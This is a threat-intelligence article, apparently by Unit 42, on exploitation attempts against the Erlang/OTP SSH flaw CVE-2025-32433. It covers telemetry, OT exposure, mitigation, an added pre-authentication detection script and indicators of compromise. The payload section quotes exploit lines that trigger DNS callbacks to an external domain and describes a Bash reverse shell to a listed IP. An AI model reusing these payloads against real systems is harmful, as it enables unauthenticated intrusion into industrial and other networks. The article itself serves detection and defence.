Executive Summary
This article presents our observations of exploit attempts targeting CVE-2025-32433. This vulnerability allows unauthenticated remote code execution (RCE) in the Secure Shell (SSH) daemon (sshd) from certain versions of the Erlang programming language’s Open Telecom Platform (OTP).
Erlang/OTP sshd is widely used in critical infrastructure and operational technology (OT) networks. With a CVSS score of 10.0, CVE-2025-32433 enables unauthenticated clients to execute commands by sending SSH connection protocol messages (codes >= 80) to open SSH ports; these messages should only be processed after successful authentication. Vulnerable versions include Erlang/OTP prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20.
A patch is available in Erlang/OTP versions OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20 and later.
We have reproduced, validated and analyzed this vulnerability to better understand its impact and provide detection strategies. We observed a significant increase in exploitation activity targeting this vulnerability from May 1-9, 2025, with 70% of our detections originating from firewalls protecting global operational technology (OT) networks.
This analysis includes telemetry data showing geographic distribution and trends as well as the industries affected by this vulnerability.
Palo Alto Networks customers are better protected from the threats discussed in this article through the products and services described in the Palo Alto Networks Product Protections section below.
If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.
Vulnerabilities Discussed: CVE-2025-32433
Details of the Vulnerability
Erlang is a programming language designed for building concurrent systems where multiple connections are needed simultaneously. Its companion framework, the Open Telecom Platform (OTP), has long been trusted in critical infrastructure from telecommunications networks to financial systems.
OT and 5G environments use Erlang/OTP due to its fault-tolerance and scalability for high availability systems with minimal downtime. Due to compliance and safety requirements, OT and 5G administrators tend to use Erlang/OTP’s native SSH implementation to remotely manage hosts, which makes CVE-2025-32433 a particular concern in these types of networks.
At the heart of Erlang/OTP’s secure communication capabilities lies its native SSH implementation — responsible for encrypted connections, file transfers and most importantly, command execution. A flaw in this implementation would allow an attacker with network access to execute arbitrary code on vulnerable systems without requiring credentials, presenting a direct and severe risk to exposed assets.
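The state check that a correct SSH dispatcher enforces, as an added detection example (not code from this article or from Erlang/OTP): it walks a plaintext SSH packet stream and flags any connection-protocol message (code >= 80) that arrives before SSH_MSG_USERAUTH_SUCCESS. The sample streams are constructed, and the packet framing is simplified (no MAC, no encryption; only the first payload byte is inspected).

```python
import struct

# SSH message codes from RFC 4250; the connection protocol (channels) starts at 80.
SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
CONNECTION_PROTOCOL_MIN = 80

def ssh_packet(payload: bytes, block_size: int = 8) -> bytes:
    """Wrap a payload in the RFC 4253 binary packet format (unencrypted, no MAC)."""
    pad_len = block_size - ((len(payload) + 5) % block_size)
    if pad_len < 4:  # RFC 4253 requires at least four bytes of padding
        pad_len += block_size
    body = bytes([pad_len]) + payload + b"\x00" * pad_len
    return struct.pack(">I", len(body)) + body

def iter_messages(stream: bytes):
    """Yield the message code of every packet in a plaintext SSH byte stream."""
    off = 0
    while off + 5 <= len(stream):
        (pkt_len,) = struct.unpack(">I", stream[off:off + 4])
        pad_len = stream[off + 4]
        payload = stream[off + 5: off + 4 + pkt_len - pad_len]
        if not payload:  # truncated or malformed packet: stop rather than misparse
            break
        yield payload[0]
        off += 4 + pkt_len

def find_preauth_connection_messages(stream: bytes):
    """Return (index, code) for each channel-layer message seen before USERAUTH_SUCCESS."""
    authenticated = False
    hits = []
    for index, code in enumerate(iter_messages(stream)):
        if code == SSH_MSG_USERAUTH_SUCCESS:
            authenticated = True
        elif code >= CONNECTION_PROTOCOL_MIN and not authenticated:
            hits.append((index, code))
    return hits

# Constructed sample streams (not captures): a normal session authenticates before
# opening a channel; the second stream jumps straight from KEXINIT to the channel layer.
def _stream(codes):
    return b"".join(ssh_packet(bytes([c]) + b"session") for c in codes)

NORMAL_SESSION = _stream([SSH_MSG_KEXINIT, SSH_MSG_NEWKEYS, SSH_MSG_USERAUTH_SUCCESS,
                          SSH_MSG_CHANNEL_OPEN, SSH_MSG_CHANNEL_REQUEST])
PREAUTH_SESSION = _stream([SSH_MSG_KEXINIT, SSH_MSG_CHANNEL_OPEN, SSH_MSG_CHANNEL_REQUEST])
```

After SSH_MSG_NEWKEYS a network sensor sees only ciphertext, so this check belongs in the server's own message dispatcher or in a host-side tool that has access to the decrypted stream.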
Analyzing global internet scanning data from Cortex Xpanse in April 2025, we saw that vulnerable Erlang/OTP SSH services were widely exposed on the internet across a range of TCP ports. This included TCP port 2222, which is commonly used for communications with older industrial automation components and sometimes used by the EtherNet/IP implicit messaging protocol.
Exposure to CVE-2025-32433 is inferred from the SSH server versions tied to Erlang/OTP releases. This widespread exposure on industrial-specific ports indicates a significant global attack surface across OT networks. Analysis of affected industries shows that exploit attempts are unevenly distributed across sectors.
In our telemetry, we saw that the following industries were disproportionately affected, with over 85% of exploit attempts being triggered directly on their OT firewalls:
- Healthcare
- Agriculture
- Media and entertainment
- High technology
Despite high OT reliance, utilities and energy, mining, and aerospace and defense showed no direct OT triggers for this specific threat.
Sectors like professional and legal services primarily saw triggers on their IT networks. Industries such as manufacturing, wholesale and retail, and financial services experienced more balanced detection across both IT and OT, necessitating integrated defenses.
Scope of Exploitation Attempts Targeting CVE-2025-32433
Our telemetry confirms active exploitation attempts of CVE-2025-32433. Our sensors have detected exploit attempts targeting this vulnerability across multiple industries, with the earliest observation occurring on May 1, 2025.
We identified several malicious payloads being delivered through CVE-2025-32433 exploit attempts. A commonly observed technique uses reverse shells to gain unauthorized remote access. Two examples seen in the wild include the following payloads.
Payload 1
File descriptors are used to create a TCP connection and bind it to a shell, allowing interactive command execution over the network, as shown in Figure 1.
Payload 2
Figure 2 shows a simpler variant that initiates a reverse shell using Bash’s interactive mode and redirects the shell’s input and output directly to a remote host at 146.103.40[.]203:6667. This port is commonly associated with remote control servers used for botnet communications.

Threat Infrastructure Insights
Our investigation into DNS telemetry was driven by DNS-based indicators we discovered during our payload analysis of exploitation attempts targeting CVE-2025-32433. Several payloads contained commands attempting DNS lookups of long, randomly generated subdomains under dns.outbound.watchtowr[.]com:
- execSinet:gethostbyname(“d0am3pi3pgl6h3t9mkp0qt3zn9p1izwso.dns.outbound.watchtowr[.]com”).Zsession
- execSinet:gethostbyname(“d0a3qn23pglekp6ckgtge8xxfd14a8ouk.dns.outbound.watchtowr[.]com”).Zsession
- execSinet:gethostbyname(“d09idt23pgl3db0en3dgeam6i45tpc6bg.dns.outbound.watchtowr[.]com”).Zsession
These payloads also provide clear signs of Out-of-Band Application Security Testing (OAST). Specifically, DNS lookups to randomized subdomains under dns.outbound.watchtowr[.]com were triggered using gethostbyname() calls — a common tactic in blind RCE or exfiltration testing.
These payloads are designed not to return results directly, but to validate execution via external DNS resolutions that the attacker monitors. This approach is widely used in stealthy campaigns, red team assessments and automated scanning frameworks.
Scope of the Activity
We conducted a multi-source analysis to understand how attackers attempt exploitation of CVE-2025-32433 in real-world environments. This analysis highlights the geographic distribution of vulnerable systems, exploit activity across key industry sectors and evolving trends over time.
Exposure Surface Analysis
Cortex Xpanse revealed 275 distinct hosts and 326 distinct Erlang/OTP services that were publicly routable on the internet between April 16 and May 9, 2025. The countries observed to host the most Erlang/OTP servers are the U.S., Brazil and France.
Cortex Xpanse scans showed that Erlang/OTP services are widely exposed and vulnerable on industrial networks. Figure 3 below shows the services found on TCP ports like 830, 2022 and 22.

The group of exposed ports includes TCP port 2222. This port is also sometimes used by EtherNet/IP implicit messaging, highlighting a direct bridge between IT-centric software vulnerabilities and the operational heart of industrial control systems.
This overlap highlights the following:
- Attack surface convergence: The blurred boundary between IT and OT systems, where a software vulnerability in an IT-facing protocol implementation such as Erlang/OTP SSH could share network space, or even ports, with industrial control system traffic.
- Increased exploitability: Attackers scanning for exploitable Erlang/OTP services could inadvertently or intentionally interact with exposed industrial control systems (ICS) devices, creating opportunities for pivoting into OT environments, especially where network segmentation is weak.
Geographic Distribution of Exploit Attempts
After the vulnerability was published on April 16, 2025, we began to detect exploit attempts from a few countries, as shown below in Figures 4 and 5. Figure 4 represents the total number of CVE-2025-32433 signatures triggered by all firewalls in a given country. Figure 5 represents signature triggers specifically from firewalls identified as being within OT networks.


Out of a total of 3,376 CVE-2025-32433 signatures triggered globally, 2,363 (approximately 70%) originated from firewalls protecting OT networks. While the figures might appear the same, South America and Scandinavia showed minimal or no OT-related exploit activity despite broader exploitation elsewhere — indicating either better segmentation, slower adoption of vulnerable stacks or detection gaps.
Countries With High OT Correlation:
- Japan: 99.74% of its CVE-2025-32433 signatures originated from OT networks
- U.S.: Despite a lower percentage (71.15%) compared to Japan, the volume of signatures in the U.S. (1,916 within OT) signifies a great number of potential incidents affecting American industrial systems
- The Netherlands, Ireland, Brazil and Ecuador: For these countries, 100% of observed CVE-2025-32433 signature triggers occurred within OT environments
- France: This country had a significant OT impact at 66.67% of observed signature triggers
The disproportionate volume of CVE-2025-32433 exploit attempts observed in OT networks across countries like Japan, the U.S. and others reflects a combination of factors, not a singular cause.
These regions often host highly connected, digitally mature industrial sectors that rely on complex IT/OT integrations where general-purpose components like Erlang/OTP could be embedded in operational environments.
Exploit Distribution by Industry
Almost 70% of the total number of signature triggers originated from firewalls protecting OT networks. Of the total number of firewalls that saw an exploit attempt, nearly 60% of the attempts were on firewalls within OT networks. Averaging out the number of exploit attempts per firewall, OT networks saw 160% more attempts per device than non-OT networks.
This indicates:
- A significant number of OT firewalls are exposed to the internet
- Adversaries might have already breached edge security, compromised enterprise devices and established persistence
- They could be launching this exploit attempt from within enterprise networks using lateral movement techniques, with the goal of accessing OT networks
- Discrepancy in exploit attempts on OT networks could indicate the intention of malicious actors to infiltrate critical infrastructure
These figures could be skewed by the small sample size analyzed.
An outsized majority of triggers originated in the education industry, both within all networks and OT networks, with 2,460 (72.7% of total) and 2,090 (88.4% of total) respectively, shown in Figure 6 below.

The industry-level distribution of CVE-2025-32433 exploitation attempts underscores a critical shift in the operational threat landscape.
We observed nearly 70% of exploit attempts within OT networks. Several sectors — including healthcare, high technology and education — showed a disproportionately high concentration of OT-specific activity.
This challenges the traditional view that OT risk is confined to industrial control systems or manufacturing. At the same time, we should not interpret the absence of detections in the following OT-heavy sectors as safety:
- Utilities and energy
- Mining
- Aerospace and defense
We should instead see it as potential evidence of detection weakness or delayed targeting.
These findings highlight that attackers are exploiting the realities of IT/OT convergence and are targeting operational systems wherever they exist.
Temporal Trends in Exploitation

Analyzing the data we have for May 2025, peaks in total triggers often correlate with OT activity. Figure 7 shows that the days with the highest total triggers (May 3, May 6, May 8, May 9) include the days with significant OT activity (May 3, May 8, May 9).
Exploitation attempts of CVE-2025-32433 are not uniform or continuous — they appear in concentrated bursts that disproportionately impact OT environments. When activity spikes, it is frequently driven by OT-specific triggers, often accounting for over 80% of detections on peak days.
The geographic, industrial and temporal footprint of CVE-2025-32433 exploit attempts highlights a strategic shift in attacker behavior toward operational environments across diverse sectors and regions. Exploits are not limited to traditionally defined industrial control systems. They appear in healthcare, education, high tech and other verticals — many of which host embedded OT systems not previously treated as high risk.
Geographically, countries with mature digital infrastructure and strong industrial bases — such as Japan, the U.S. and Brazil — show high OT exposure, while sectors like utilities and mining show no detections despite high inherent risk. This suggests telemetry gaps, delayed targeting or underreporting. Combined, these patterns illustrate that modern OT threats do not follow legacy assumptions about where OT resides or how it is attacked.
We have confirmed active exploitation attempts through payload telemetry, with disproportionate impact on OT networks across multiple industries. The use of stealthy reverse shells and DNS-based callbacks further indicates that attackers are employing evasive techniques.
Mitigation Guidance
The rapid surge in attack payloads suggests that threat actors have quickly adopted this exploit in active campaigns. This pattern underscores the urgency for organizations — particularly those in the targeted sectors and geographies outlined above — to improve protections.
- Apply the latest security patches
- Update intrusion prevention systems with the newest signatures
- Closely monitor environments for signs of compromise
The primary mitigation for this vulnerability is to upgrade Erlang/OTP to a patched version:
- OTP 27.3.3 or later
- OTP 26.2.5.11 or later
- OTP 25.3.2.20 or later
As a temporary workaround (if patching is not immediately possible), consider disabling the SSH server or using firewall rules to restrict access to trusted sources only (as suggested by NIST).
Conclusion
CVE-2025-32433 is a serious vulnerability resulting from improper state enforcement in the Erlang/OTP SSH daemon, which could potentially allow unauthenticated RCE. The failure to reject post-authentication messages before authentication completion creates a significant attack surface that is being exploited in the wild.
Attackers are attempting to exploit the vulnerability in short, high-intensity bursts. These are disproportionately targeting OT networks and attempting to access exposed services over both IT and industrial ports. Early telemetry confirms that the threat extends far beyond traditional industrial sectors, impacting education, healthcare and high technology — underscoring the reality that critical OT assets now exist across a much broader digital surface area.
Organizations must re-examine their exposure, enhance OT-specific visibility and treat CVE-2025-32433 not as an isolated issue, but as a case study in how general-purpose software flaws can rapidly escalate into operational threats.
Palo Alto Networks Product Protections for CVE-2025-32433
Palo Alto Networks customers are better protected from these threats by the products and services listed below.
Cortex XDR and XSIAM are designed to prevent the execution of known malware, and also prevent the execution of unknown malware using Behavioral Threat Protection.
Cortex Xpanse has the ability to identify exposed devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.
Next-Generation Firewall with the Advanced Threat Prevention subscription can help block activity associated with CVE-2025-32433 (Erlang OTP SSH Remote Code Execution Vulnerability) with the release of our threat prevention signature 96163.
If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:
- North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
- UK: +44.20.3743.3660
- Europe and Middle East: +31.20.299.3130
- Asia: +65.6983.8730
- Japan: +81.50.1790.0200
- Australia: +61.2.4062.7950
- India: 00080005045107
Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.
Indicators of Compromise
- .dns.outbound.watchtowr[.]com
- 194.165.16[.]71
- 146.103.40[.]203